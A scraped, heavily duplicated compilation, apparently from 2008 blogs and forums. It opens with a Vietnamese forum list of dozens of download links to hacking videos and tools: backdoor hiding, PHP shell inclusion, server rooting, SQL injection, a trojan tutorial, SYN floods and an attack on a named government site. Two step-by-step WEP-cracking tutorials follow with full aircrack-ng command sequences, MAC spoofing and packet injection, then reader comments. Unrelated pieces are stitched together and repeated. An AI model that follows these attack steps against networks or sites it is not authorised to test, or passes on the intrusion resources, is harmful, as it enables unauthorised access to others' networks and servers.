http://www.megaupload.com/?d=1KGA9NGK
40>Backdoor and JPG
http://str0ke213.tradebit.com/pub/8/57.swf
41>Crack MD5 user online and Cain
http://dl1.filmshare24h.net/md5-password-cracking.swf
42>hack computer trên mạng internet!
http://www.y0ume.net/video/hack%20computer.rar
43>409 Video hack
http://www.forcehacker.com/videos.html
44>một cách ẩn shell
http://www.y0ume.net/video/chenshell.rar
45>Một đống video hacking nhìu wá
http://137.132.19.24/security_course/vid_tutorials/
46>Windows Password Hacking (Video)
http://www.youtube.com/watch?v=vZDgR...search=laporte
47>iFrame DoS Explained
http://one.revver.com/watch/211124
48>Hack Shop CFM ,Remote PC,Check CC
http://uploadingit.com/files/197409_...S(Fix%202).zip
49>video hacking from PLD
http://rapidshare.de/files/36172349/Sec.Videos1.rar
http://rapidshare.de/files/36169967/Sec.Videos2.rar
50>video clip attack thanhhoa.gov.vn
khoai.bop.vu/thanhhoa.rar
51>TUT hack shop asp moi!!!!!!!!!!!!!!!
http://207.210.226.130/~thomaser/tool/hackasp.rar
52>upload hacking phần 2
http://thanhnamhp.com.vn/upload.rar
http://www.videos.learntohell.net/infectedgif.swf
53>VNC Remote video
http://kid1412.110mb.com/Remote-vnc.rar
http://kid1412.110mb.com/VNC.zip
54>1 kho video nữa nè
Anh em down thoải mái nha
http://aria-security.net/UPDATES/1st/Video/
http://video.hackinthebox.org/2006.html
http://chaosradio.ccc.de/22c3_m4v_563.html
http://shmoocon.org/2006/presentations.html
How Get Root Safe Mode On Server
http://www.freewebs.com/lyokha/CraVideos.rar
55> windows fun
http://warezshare.com/download.php?f...541ea58e44c56f
http://warezshare.com/download.php?f...10ddc3e346dbe2
56>Include shell trong PHP
phan 1: http://www.megaupload.com/vn/?d=9YW156EC
phan 2: http://www.megaupload.com/?d=Y8HFO9EH
57>video chào mừng 2/9
http://www.megaupload.com/?d=I92BALB5
58>==>>Windows server rooting<<==
http://www.freewebs.com/lyokha/winserverrooting.avi.flv
59>Video Local r00t Update 2007 - zer0c00l
http://rapidshare.com/files/51844339/r00t2007.rar.html
60>video dùng trojan Shark 2
http://freewebtown.com/hackingvn/videohack/sharK 2 Tutorial.rar
61>clip hack VBB với lỗi SQL injection ( mod RPG Inferno v2.4)
http://69.89.31.82/~seyiloco/leo9x/leo.rar
http://69.89.31.82/~seyiloco/leo9x/leo.txt
http://69.89.31.82/~seyiloco/leo9x/milw0rm.txt
62>Video hacking , bug upload :-D
http://www.megaupload.com/?d=S7W44YQ0
63>Chèn Backdoor vào tập tin JPG
http://str0ke213.tradebit.com/pub/8/57.swf
64>getroot
http://quangtrungschool.org/upload/getroot1.rar
65>[video] Include Shell VBB & Hide Backdoor for newbie
http://www.box.net/public/2koz7exe6q
66>Video hack ibf
http://www.badongo.com/file/3562304
http://www.quangtrungschool.org/upload/Hack_ipf.rar
67>video download by pass!
http://66.165.236.155/~wayland/Tut.zip
68>Exploit For vBulletin_all_version
http://www.megaupload.com/?d=YK270LVU
69>Include shell với PhpBB
http://rapidshare.com/files/9742816/...shell.rar.html
http://www.4shared.com/file/8167032/...ludeshell.html
70>Video Music Thai Anh exp-do Langtuhoahao found !!!
http://orange.smartwavetech.com/~yeu...on_thaianh.rar
71>tài nguyên video
http://www.irdu.nus.edu.sg/security_...vid_tutorials/
72>Video Lesson - Inject Trojan 2 Web vs Hack Infobar Sp2
Link : http://z0mbie12.net/videoclip/exe2vbs-videohacking2.rar
73>Invision Power Board 2.1.7 (Debug) Remote Password Change Demonstration
http://rapidshare.com/files/19230640...onstration.rar
or
http://rapidshare.com/files/2155224/ipb217.swf
74>Bugs local backup data
tp://tailieumang.info/Tut.zip
75>SYN Flood
http://k49c.net/gk/SYNFlood.rar
76>Hacking Movies
http://2600.ir/pages/videoclips.htm
77>tut hack site ezupload (video)
http://www.megaupload.com/?d=GCSXUELR
78>1 site rất hay
http://www.giaiphapantoan.com/index....per&Itemid=112
79>Video Get root Linux 2.4.25
http://www.megaupload.com/?d=T9BCFRF4 or
http://www.4shared.com/file/8358713/...ot_Access.html
80>sử dụng bug eGallery trong PHP-Nuke để upshell lên server
http://milw0rm.com/video/watch.php?id=29
81>1 site security video
www.learnsecurityonline.com
http://phreaknic.wilpig.org/
http://www.hackerscenter.com/video/
http://www.illegalworld.com/
82>Video hacking phpinjection
http://video.antichat.org/download_150.html
Sưu tập
۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩ Chữ ký của itvnn ۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩
url:http://haiphongit.com/forum/showthread.php?t=1388
có thể 1 số link đã die mong ae thông cảm dùm,link nào die ae kiếm cái khác fix dùm nha
1> http://warezshare.com/download.php?f...df7d54a71f7663
2> http://thanhnamhp.com.vn/cfm.rar
3> http://www.filenanny.com/files/46ecc.../Hacklocal.rar
bug local backup data
4> http://www.mediamax.com/vipundergrou...kup%20data.zip
5>hack shop cfm
http://www.mediamax.com/vipundergroup/Hosted/cfm.rar
6>down load hack
http://www.mediamax.com/vipundergrou...d/download.rar
7>bug esyndicat
http://www.mediamax.com/vipundergrou..._esyndicat.rar
8>bug ezupload
http://www.mediamax.com/vipundergrou...upload-leo.rar
9>file manager bug
http://www.mediamax.com/vipundergrou...le_Manager.rar
10>get root 1
http://www.mediamax.com/vipundergrou...d/getroot1.rar
11>get root2
http://www.mediamax.com/vipundergrou...d/getroot2.rar
12>get root3
http://www.mediamax.com/vipundergrou...d/getroot3.rar
13>Hacking vbb 3.6.6 bug XSS
http://www.mediamax.com/vipundergrou...g%20XXS%29.rar
14>hide backdoor1
http://www.mediamax.com/vipundergrou...0backdoor1.rar
15>hide backdoor2
http://www.mediamax.com/vipundergrou...0backdoor2.rar
16>how i get free host (hack host demo)
http://www.mediamax.com/vipundergrou...etfreehost.rar
17>Invision_Power_Board_2[1].1.7_Password_Change_Demonstration
http://www.mediamax.com/vipundergrou..._Power_Board_2
18>local hack1
http://www.mediamax.com/vipundergrou...al%20hack1.rar
19>local hack2
http://www.mediamax.com/vipundergrou...al%20hack2.rar
20>local hack3
http://www.mediamax.com/vipundergrou...al%20hack3.rar
21>Phim huong dan hack co ban nhat
http://www.mediamax.com/vipundergrou...dan%20hack.rar
22>phpbb
http://www.mediamax.com/vipundergroup/Hosted/phpbb.rar
23>Remote destop hack
http://www.mediamax.com/vipundergrou...Remote-vnc.rar
24>rEmOtEr_VS_Microsoft
http://www.mediamax.com/vipundergrou..._Microsoft.rar
25>SQL injection1
http://www.mediamax.com/vipundergrou...Linjection.rar
26>SQL injection2
http://www.mediamax.com/vipundergrou...injection2.rar
27>how to hack thanhhoa.gov.vn
http://www.mediamax.com/vipundergrou...d/thanhhoa.rar
28>upload hack1
http://www.mediamax.com/vipundergrou...ed/upload1.rar
29>upload hack2
http://www.mediamax.com/vipundergrou...ed/upload2.rar
30>upload hack3
http://www.mediamax.com/vipundergrou...ed/upload3.rar
31>vbb 3.5.x bug ugrade
http://www.mediamax.com/vipundergrou...g%20ugrade.rar
32>video fake ip
http://www.mediamax.com/vipundergrou...0fake%20ip.rar
windows exploit
33>http://www.mediamax.com/vipundergrou...ws-exploit.rar
34>xsst unnelling-video
http://www.mediamax.com/vipundergrou...ling-video.zip
35>Yahoo Fake [FuLL ViDEO bY HeliOs]
http://www.mediamax.com/vipundergrou...ahoo%20Fake%20[FuLL%20ViDEO%20bY%20HeliOs].rar
36>hackshop
http://www.mediamax.com/vipundergrou...d/hackshop.rar
37>video tut backconnect "Moi nguoi fale Ip thif down duoc bang link nay"
http://freewebtown.com/hackingvn/vid...backconect.rar
38>SQL Injection 4
http://www.box.net/shared/static/rsuoufbpj1.rar
or http://rapidshare.com/files/59957095/leo2.rar
39>Demo how i got root on server HPTVIETNAM
http://www.megaupload.com/?d=1KGA9NGK
40>Backdoor and JPG
http://str0ke213.tradebit.com/pub/8/57.swf
41>Crack MD5 user online and Cain
http://dl1.filmshare24h.net/md5-password-cracking.swf
42>hack computer trên mạng internet!
http://www.y0ume.net/video/hack%20computer.rar
43>409 Video hack
http://www.forcehacker.com/videos.html
44>một cách ẩn shell
http://www.y0ume.net/video/chenshell.rar
45>Một đống video hacking nhìu wá
http://137.132.19.24/security_course/vid_tutorials/
46>Windows Password Hacking (Video)
http://www.youtube.com/watch?v=vZDgR...search=laporte
47>iFrame DoS Explained
http://one.revver.com/watch/211124
48>Hack Shop CFM ,Remote PC,Check CC
http://uploadingit.com/files/197409_...S(Fix%202).zip
49>video hacking from PLD
http://rapidshare.de/files/36172349/Sec.Videos1.rar
http://rapidshare.de/files/36169967/Sec.Videos2.rar
50>video clip attack thanhhoa.gov.vn
khoai.bop.vu/thanhhoa.rar
51>TUT hack shop asp moi!!!!!!!!!!!!!!!
http://207.210.226.130/~thomaser/tool/hackasp.rar
52>upload hacking phần 2
http://thanhnamhp.com.vn/upload.rar
http://www.videos.learntohell.net/infectedgif.swf
53>VNC Remote video
http://kid1412.110mb.com/Remote-vnc.rar
http://kid1412.110mb.com/VNC.zip
54>1 kho video nữa nè
Anh em down thoải mái nha
http://aria-security.net/UPDATES/1st/Video/
http://video.hackinthebox.org/2006.html
http://chaosradio.ccc.de/22c3_m4v_563.html
http://shmoocon.org/2006/presentations.html
How Get Root Safe Mode On Server
http://www.freewebs.com/lyokha/CraVideos.rar
55> windows fun
http://warezshare.com/download.php?f...541ea58e44c56f
http://warezshare.com/download.php?f...10ddc3e346dbe2
56>Include shell trong PHP
phan 1: http://www.megaupload.com/vn/?d=9YW156EC
phan 2: http://www.megaupload.com/?d=Y8HFO9EH
57>video chào mừng 2/9
http://www.megaupload.com/?d=I92BALB5
58>==>>Windows server rooting<<==
http://www.freewebs.com/lyokha/winserverrooting.avi.flv
59>Video Local r00t Update 2007 - zer0c00l
http://rapidshare.com/files/51844339/r00t2007.rar.html
60>video dùng trojan Shark 2
http://freewebtown.com/hackingvn/videohack/sharK 2 Tutorial.rar
61>clip hack VBB với lỗi SQL injection ( mod RPG Inferno v2.4)
http://69.89.31.82/~seyiloco/leo9x/leo.rar
http://69.89.31.82/~seyiloco/leo9x/leo.txt
http://69.89.31.82/~seyiloco/leo9x/milw0rm.txt
62>Video hacking , bug upload :-D
http://www.megaupload.com/?d=S7W44YQ0
63>Chèn Backdoor vào tập tin JPG
http://str0ke213.tradebit.com/pub/8/57.swf
64>getroot
http://quangtrungschool.org/upload/getroot1.rar
65>[video] Include Shell VBB & Hide Backdoor for newbie
http://www.box.net/public/2koz7exe6q
66>Video hack ibf
http://www.badongo.com/file/3562304
http://www.quangtrungschool.org/upload/Hack_ipf.rar
67>video download by pass!
http://66.165.236.155/~wayland/Tut.zip
68>Exploit For vBulletin_all_version
http://www.megaupload.com/?d=YK270LVU
69>Include shell với PhpBB
http://rapidshare.com/files/9742816/...shell.rar.html
http://www.4shared.com/file/8167032/...ludeshell.html
70>Video Music Thai Anh exp-do Langtuhoahao found !!!
http://orange.smartwavetech.com/~yeu...on_thaianh.rar
71>tài nguyên video
http://www.irdu.nus.edu.sg/security_...vid_tutorials/
72>Video Lesson - Inject Trojan 2 Web vs Hack Infobar Sp2
Link : http://z0mbie12.net/videoclip/exe2vbs-videohacking2.rar
73>Invision Power Board 2.1.7 (Debug) Remote Password Change Demonstration
http://rapidshare.com/files/19230640...onstration.rar
or
http://rapidshare.com/files/2155224/ipb217.swf
74>Bugs local backup data
tp://tailieumang.info/Tut.zip
75>SYN Flood
http://k49c.net/gk/SYNFlood.rar
76>Hacking Movies
http://2600.ir/pages/videoclips.htm
77>tut hack site ezupload (video)
http://www.megaupload.com/?d=GCSXUELR
78>1 site rất hay
http://www.giaiphapantoan.com/index....per&Itemid=112
79>Video Get root Linux 2.4.25
http://www.megaupload.com/?d=T9BCFRF4 or
http://www.4shared.com/file/8358713/...ot_Access.html
80>sử dụng bug eGallery trong PHP-Nuke để upshell lên server
http://milw0rm.com/video/watch.php?id=29
81>1 site security video
www.learnsecurityonline.com
http://phreaknic.wilpig.org/
http://www.hackerscenter.com/video/
http://www.illegalworld.com/
82>Video hacking phpinjection
http://video.antichat.org/download_150.html
Sưu tập
۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩ Chữ ký của itvnn ۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩
url:http://haiphongit.com/forum/showthread.php?t=1388
Tuesday, September 9, 2008
Tutorial: Cracking WEP Using Backtrack 3
19 Aug 2008
Tutorial: Cracking WEP Using Backtrack 3
Standard Disclaimer: This article is provided for informational purposes only. thew0rd.com and its affiliates accept no liability for providing this information. Please only use to test configurations on your own equipment. Accessing WIFI networks that do not belong to you is ILLEGAL.
This article will explan how to crack 64bit and 128bit WEP on many WIFI access points and routers using Backtrack, a live linux distribution. Your mileage may very. The basic theory is that we want to connect to an Access Point using WEP Encryption, but we do not know the key. We will attack the wifi router, making it generate packets for our cracking effort, finally cracking the WEP key. I have tested this technique on an IBM Thinkpad x60 and Acer 5672 and the WIFI Chipset in those machines work for sure.
Requirements:
* Backtrack 3 on CD or USB
* Computer with compatible 802.11 wireless card
* Wireless Access point or WIFI Router using WEP encryption
I will assume that you have downloaded and booted into Backtrack 3. If you haven’t figured that part out, you probably shouldn’t be trying to crack WEP keys. Once Backtrack is loaded, open a shell and do the following:
Preparing The WIFI Card
First we must enable “Monitor Mode” on the wifi card. If using the Intel® PRO/Wireless 3945ABG chipset issue the following commands:
modprobe -r iwl3945
modprobe ipwraw
The above commands will enable monitor mode on the wireless chipset in your computer. Next we must stop your WIFI card:
iwconfig
Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:
airmon-ng stop [device]
Then:
ifconfig down [interface]
Now we must change the MAC address of the adapter:
macchanger --mac 00:11:22:33:44:66 [device]
Its now time to start the card in monitor mode by doing:
airmon-ng start [device]
airmon-ngstart1.png
Attacking The Target
It is now time to locate a suitable WEP enabled network to work with:
airodump-ng [device]
airodumpwifi0.png
Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target network. Now we must start collecting data from the WIFI access point for the attack:
airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]
airodumpoutput.png
The above command will output data collected to the file: network.out. This file will be fed into the WEP Crack program when we are ready to crack the WEP key.
Open another shell and leave the previous command running. Now we need to generate some fake packets to the access point to speed up the data output. Test the access point by issuing the following command:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
aireplayfakeauth.png
If this command is successful we will now generate many packets on the target network so that we can crack the KEY. Type:
airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
aireplaygenerateivs.png
This will force the access point to send out a bunch of packets which we can then use to crack the WEP key. Check your aerodump-ng shell and you should see the “data” section filling up with packets.
captureivs_0.png
After about 10,000-20,000 you can begin cracking the WEP key. If there are no other hosts on the target access point generating packets, you can try:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
aireplayattack2p.png
Once you have enough packets, you begin the crack:
aircrack-ng -n 128 -b [bssid] [filename]-01.cap
The “-n 128″ signifies a 128-bit WEP key. If cracking fails, try a 64-bit key by changing the value of N to 64.
crackng.png
Once the crack is successful you will be left with the KEY! Remove the : from the output and there is your key. So there you have it.
You can use these techniques to demonstrate to others why using WEP is a bad idea. I suggest you use WPA2 encryption on your wireless networks. Goodluck!
Tutorial: Cracking WEP Using Backtrack 3
Standard Disclaimer: This article is provided for informational purposes only. thew0rd.com and its affiliates accept no liability for providing this information. Please only use to test configurations on your own equipment. Accessing WIFI networks that do not belong to you is ILLEGAL.
This article will explan how to crack 64bit and 128bit WEP on many WIFI access points and routers using Backtrack, a live linux distribution. Your mileage may very. The basic theory is that we want to connect to an Access Point using WEP Encryption, but we do not know the key. We will attack the wifi router, making it generate packets for our cracking effort, finally cracking the WEP key. I have tested this technique on an IBM Thinkpad x60 and Acer 5672 and the WIFI Chipset in those machines work for sure.
Requirements:
* Backtrack 3 on CD or USB
* Computer with compatible 802.11 wireless card
* Wireless Access point or WIFI Router using WEP encryption
I will assume that you have downloaded and booted into Backtrack 3. If you haven’t figured that part out, you probably shouldn’t be trying to crack WEP keys. Once Backtrack is loaded, open a shell and do the following:
Preparing The WIFI Card
First we must enable “Monitor Mode” on the wifi card. If using the Intel® PRO/Wireless 3945ABG chipset issue the following commands:
modprobe -r iwl3945
modprobe ipwraw
The above commands will enable monitor mode on the wireless chipset in your computer. Next we must stop your WIFI card:
iwconfig
Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:
airmon-ng stop [device]
Then:
ifconfig down [interface]
Now we must change the MAC address of the adapter:
macchanger --mac 00:11:22:33:44:66 [device]
Its now time to start the card in monitor mode by doing:
airmon-ng start [device]
airmon-ngstart1.png
Attacking The Target
It is now time to locate a suitable WEP enabled network to work with:
airodump-ng [device]
airodumpwifi0.png
Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target network. Now we must start collecting data from the WIFI access point for the attack:
airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]
airodumpoutput.png
The above command will output data collected to the file: network.out. This file will be fed into the WEP Crack program when we are ready to crack the WEP key.
Open another shell and leave the previous command running. Now we need to generate some fake packets to the access point to speed up the data output. Test the access point by issuing the following command:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
aireplayfakeauth.png
If this command is successful we will now generate many packets on the target network so that we can crack the KEY. Type:
airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
aireplaygenerateivs.png
This will force the access point to send out a bunch of packets which we can then use to crack the WEP key. Check your aerodump-ng shell and you should see the “data” section filling up with packets.
captureivs_0.png
After about 10,000-20,000 you can begin cracking the WEP key. If there are no other hosts on the target access point generating packets, you can try:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
aireplayattack2p.png
Once you have enough packets, you begin the crack:
aircrack-ng -n 128 -b [bssid] [filename]-01.cap
The “-n 128″ signifies a 128-bit WEP key. If cracking fails, try a 64-bit key by changing the value of N to 64.
crackng.png
Once the crack is successful you will be left with the KEY! Remove the : from the output and there is your key. So there you have it.
You can use these techniques to demonstrate to others why using WEP is a bad idea. I suggest you use WPA2 encryption on your wireless networks. Goodluck!
Saturday, September 6, 2008
Cracking WEP Using Backtrack: A Beginner’s Guide
A. SCOPE
This tutorial is intended for user's with little or no experience with linux or wifi. The folks over at remote-exploit have released "Backtrack" a tool which makes it ridiculously easy to access any network secured by WEP encryption. This tutorial aims to guide you through the process of using it effectively.
Required Tools
1. You will need a computer with a wireless adapter listed here
2. Download Backtrack and burn it's image to a CD
B. OVERVIEW
BACKTRACK is a bootable live cd with a myriad of wireless and tcp/ip networking tools. This tutorial will only cover the included kismet and aircrack-ng suite of tools.
Tools Overview
* Kismet - a wireless network detector and packet sniffer
* airmon - a tool that can help you set your wireless adapter into monitor mode (rfmon)
* airodump - a tool for capturing packets from a wireless router (otherwise known as an AP)
* aireplay - a tool for forging ARP requests
* aircrack - a tool for decrypting WEP keys
* iwconfig - a tool for configuring wireless adapters. You can use this to ensure that your wireless adapter is in "monitor" mode which is essential to sending fake ARP requests to the target router
* macchanger - a tool that allows you to view and/or spoof (fake) your MAC address
Glossary of Terms
* AP: Access Point: a wireless router
* MAC Address: Media Access Control address, a unique id assigned to wireless adapters and routers. It comes in hexadecimal format (ie 00:11:ef:22:a3:6a)
* BSSID: Access Point's MAC address
* ESSID: Access Point's Broadcast name. (ie linksys, default, belkin etc) Some AP's will not broadcast their name but Kismet may be able to detect it anyway
* TERMINAL: MS-Dos like command line interface. You can open this by clicking the black box icon next to the start key in backtrack
* WEP: short for Wired Equivalency Privacy, it is a security protocol for Wi-Fi networks
* WPA: short for WiFi Protected Access. a more secure protocal than WEP for wireless networks. NOTE: this tutorial does not cover cracking WPA encryption
Since Backtrack is a live CD running off your cdrom, there is nowhere that you can write files to unless you have a linux partition on your hard drive or a usb storage device. Backtrack has some NTFS support so you will be able to browse to your windows based hard drive should you have one, but it will mount the partition as "read-only". I dual boot windows and ubuntu on my laptop so I already have a linux swap partition and a reiserfs partition. Backtrack had no problem detecting these and mounting them for me. To find your hard drive or usb storage device, just browse to the /mnt folder in the file manager. Typically a hard drive will appear named something like hda1 or hda2 if you have more than one partition on the drive. Alternately hdb1 could show if you have more than one hard disk. Having somewhere to write files that you can access in case you need to reboot makes the whole process a little easier.
C. DISCLAIMER
Hacking into someone's wireless network without permission is probably against the law. I wouldn't recommend doing it. I didn't break into anyone else's network while learning how to do this .
D. IMPLEMENTATION
STEP 1
Monitoring Wireless Traffic With Kismet
Place the backtrack CD into your cd-rom drive and boot into Backtrack. You may need to change a setting in your bios to boot from cd rom. During boot up you should see a message like "Hit ctrl+esc to change bios settings". Changing your first boot device to cdrom will do the trick. Once booted into linux, login as root with username: root password: toor. These are the default username and password used by backtrack. A command prompt will appear. Type startx to start KDE (a 'windows' like workspace for linux).
Once KDE is up and running start kismet by clicking on the start key and browsing to Backtrack->Wireless Tools -> Analyzers ->Kismet. Alternatively you can open a Terminal and type:
kismet
Kismet will start running and may prompt you for your wireless adapter. Choose the appropriate adapter, most likely 'ath0', and sit back as kismet starts detecting networks in range.
NOTE: We use kismet for two reasons.
1. To find the bssid, essid, and channel number of the AP you are accessing.
2. Kismet automatically puts your wireless adapter into monitor mode (rfmon). It does this by creating a VAP (virtual access point?) or in other words, instead of only having ath0 as my wireless card it creates a virtual wifi0 and puts ath0 into monitor mode automatically. To find out your device's name just type:
iwconfig
Which will look something like this:
iwconfig.png
While kismet detects networks and various clients accessing those networks you might want to type 's' and then 'Q' (case sensitive). This sorts all of the AP's in your area by their signal strength. The default 'autofit' mode that kismet starts up in doesn't allow you much flexibility. By sorting AP's by signal strength you can scroll through the list with the arrow keys and hit enter on any AP you want more information on. (side note: when selecting target AP keep in mind this tutorial only covers accessing host AP's that use WEP encryption. In kismet the flags for encryption are Y/N/0. Y=WEP N=Open Network- no encryption 0= other: WPA most likely.) Further reading on Kismet is available here.
Select the AP (access point) you want to access. Copy and paste the broadcast name(essid), mac address(bssid), and channel number of your target AP into a text editor. Backtrack is KDE based so you can use kwrite. Just open a terminal and type in 'kwrite' or select it from the start button. In Backtrack's terminal to copy and paste you use shift+ctrl+c and shift+control+v respectively. Leave kismet running to leave your wireless adapter in monitor mode. You can also use airmon to do this manually. airmon-ng -h for more help with this
STEP 2
Collecting Data With Airodump
Open up a new terminal and start airodump so we can collect ARP replies from the target AP. Airodump is fairly straight forward for help with this program you can always type "airodump-ng -h" at the command prompt for additional options.
airodump-ng ath0 -w /mnt/hda2/home/ryan/belkin_slax_rcu 9 1
Breaking down this command:
* ath0 is my wireless card
* -w tells airodump to write the file to
/mnt/hda2/ryan/belkin_slax_rcu
* 9 is the channel 9 of my target AP
* 1 tells airodump to only collect IVS - the data packets with the WEP key
STEP 3
Associate your wireless card with the AP you are accessing.
aireplay-ng -1 0 -e belkin -a 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 ath0
* -1 at the beginning specifies the type of attack. In this case we want fake authentication with AP. You can view all options by typing aireplay-ng -h
* 0 specifies the delay between attacks
* -e is the essid tag. belkin is the essid or broadcast name of my target AP. Linksys or default are other common names
* -a is the bssid tag(MAC address). 00:11:22:33:44:55 is the MAC address of the target AP
* -h is your wireless adapters MAC addy. You can use macchanger to view and change your mac address. macchanger -s ath0
* ath0 at the end is my wireless adapters device name in linux
STEP 4
Start packet injection with aireplay
aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 ath0
* NOTES: -b requires the MAC address of the AP we are accessing.
* -h is your wireless adapters MAC addy. You can use macchanger to view and change your mac address. macchanger -s ath0
* if packets are being collected at a slow pace you can typeiwconfig ath0 rate auto to adjust your wireless adapter's transmission rate. You can find your AP's transmission rate in kismet by using the arrow keys up or down to select the AP and hitting enter. A dialog box will pop up with additional information. Common rates are 11M or 54M.
As aireplay runs, ARP packets count will slowly increase. This may take a while if there aren't many ARP requests from other computers on the network. As it runs however, the ARP count should start to increase more quickly. If ARP count stops increasing, just open up a new terminal and re-associate with the ap via step 3. There is no need to close the open aireplay terminal window before doing this. Just do it simultaneously. You will probably need somewhere between 200-500k IV data packets for aircrack to break the WEP key.
If you get a message like this:
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Just reassociate with the AP following the instructions on step 3.
STEP 5
Decrypting the WEP Key with Aircrack
Find the location of the captured IVS file you specified in step 2. Then type in a terminal:
aircrack-ng -s /mnt/hda2/home/belkin_slax_rcu-03.ivs
Change /mnt/hda2/home/belkin_slax_rcu-03.ivs to your file's location
Once you have enough captured data packets decrypting the key will only take a couple of seconds. For my AP it took me 380k data packets. If aircrack doesn't find a key almost immediately, just sit back and wait for more data packets.
aircrack.png
If this guide doesn't fully answer your questions you can always refer to the forums at remote-exploit.org
url:http://ryanunderdown.com/2007/02/12/cracking-wep-using-backtrack/
91 Comments
1.
Jul 12th, 2007
aquastrike
Great tutorial!
2.
Jul 24th, 2007
Stonkey
Hey, great stuff. Is there somewhere I can download this with the pictures embedded in it and all that?
3.
Jul 25th, 2007
Ryan
I added a print this post option. You might want to print the images seperately.
4.
Jul 31st, 2007
Guanji
WOW.. trust me i have been to thousands of forums and read post but this is by far the most detailed tutorial so far. It looks like you are using ubuntu which is great, I dual boot with windows as well. I am going to use BackTrack to perform this lab test at home as it comes with more security tools. I love ubuntu soon as i change my video card and figure out the dual boot. ATI are pain in the ass.
5.
Jul 31st, 2007
Ryan
Thanks Guanji
I do use Ubuntu on my laptop normally, and i took some of the snapshots from within it. I used backtrack to do the real work though, which is packet injection. I need to update this to work with backtrack 2.0. I should have it done over the weekend.
6.
Jul 31st, 2007
Guanji
Hey you dont have to update the computer when it loads do you? i know there are dependencies so maybe i would need a lan connection? Right now i use an air card for my laptop but im trying to do this on my desktop which is connectionless..
7.
Aug 10th, 2007
Tony
Great how-to! Let me just mention that, in BT2 you can also start Kismet with “start-kismet-ng”. This auto configures kismet.conf and runs Kismet.
8.
Aug 14th, 2007
Ryan
Thanks Tony, I still haven’t had time to test out BT2. Im looking forward to it. The improved support for usb wireless devices should definitely make it more useful for beginners.
9.
Aug 17th, 2007
nym-ph
yeah.. wep crackin’s easy. you just made it even simpler.
great guide, very direct and easy to understand.
10.
Aug 25th, 2007
olva
does this back track have a driver for intel /PRO wireless network device or not ?? because it doesn’t feel my wireless device , i do not know why and what i can do to fix this ?
11.
Aug 26th, 2007
Ryan
the list of compatible wireless adapters can be found here:
http://backtrack.offensive-security.com/index.php?title=HCL:Wireless
12.
Aug 28th, 2007
RW
Hey, great guide, Ryan!
I’ve been doing a lot of googling, and this is the best one I’ve found so far!
13.
Sep 1st, 2007
Wallawallaa
Ryan, thanks for the tutorial but i am having some problems with mine working. it seems like u are a Linux Master and i was wondering if u could help me out. i think my problem is my internet card. i am using the internal one out of my mac book. i just wanted to know what you thought. thanks
14.
Sep 1st, 2007
Ryan
Haha, well thanks, but I am definitely NOT a linux master. It sounds like your card is likely the culprit. The best thing to do is see if your card is on the list of supported cards. If it isn’t, your card won’t be able to do the packet injection necessary for this tutorial to be of any help.
15.
Sep 5th, 2007
benjab
Hey there, Great tutorial… I have backtrack 2 and I can’t tell if my card is compatable. I have an Atheros AR5BMB5 (According to the underside of my Acer aspire 9300 laptop)
Any ideas,… I mean is that the actual name of my card? as I can’t find any mention of it on the compatability list on madwifi
16.
Sep 5th, 2007
Ryan
Hi benjab, your card should be using the atheros chipset which *should* work. Good Luck and let me know!
17.
Sep 11th, 2007
Gozzy
Hi ,
I just tryed your tutirial and after this line i get an error :
unknow command.
airodump-ng ath0 -w /mnt/hda2/home/ryan/belkin_slax_rcu 9 1
I am working from the cd .
18.
Sep 11th, 2007
Ryan
Hmm not sure… maybe the backtrack 2.0 live cd uses regular airodump and not airodump-ng…
you could try
airodump ath0 -w /path/filename
good luck!
19.
Sep 19th, 2007
Justin
Hey Ryan, I love this tutorial, its just detailed enough without being condescending. I’m using backtrack 2 and the commands are quite different (but I’ve figured them out accordingly) so everything seems to be working well, but the IVS collection is slow as hell (100 IVS packets in 45 mins, even though reading and sending packets moves quite fast). I’m using an older Proxim card (the Gold a/b 8460-05) but it’s not on the list, so I’m wondering if you think that may be my problem. Everything seems to work, but it would literally take days to collect enough of the packets I need. Also, I’m cracking my own connection, so it’s in an optimal environment.
And Gozzy, you need you change it up to this:
‘airodump-ng –ivs -w /root/Desktop/ (whatever channel number) ath0′
–ivs tells it only to save the ivs packets, the directory will save it to your desktop and the channel is whatever channel you’re working on. It’s a lot different from backtrack 1.
20.
Sep 19th, 2007
Ryan
Hi Justin,
Ya, this tutorial definitely needs an update… To ask the obvious question: Are you using packet injection with aireplay? Because if you aren’t then it stands to reason that your IV packet collection would be extremely slow. With aireplay spamming arp requests to the access point your IV collection should go very fast. 5-10 minutes max.
EDIT: after re-reading your comment, I think packet injection is failing. I would suspect your card is indeed the problem.
21.
Sep 26th, 2007
joe
Yeah, Backtrack 2.0 uses very different command line options, it was very frustrating.
Also, for some reason I can’t run aireplay, it says cannot execute binary file for some reason… why would it do that? it also does that with standard linux commands like vi or nano stuff like that, weird.
22.
Sep 27th, 2007
Andrew
Hi!
I’m new for BT, I have a little problem. When BT starts, I type in name and pass, after then I type : startx
and it says:
-bash: bt: command not found
Can you help me ?
Thx a lot!
23.
Sep 27th, 2007
Ryan
Hi Joe & Andrew
Are you guys running it off of the live cd? I’m not really sure what’s going on. You might try the forums over at remote-exploit.org.
24.
Sep 30th, 2007
Alf
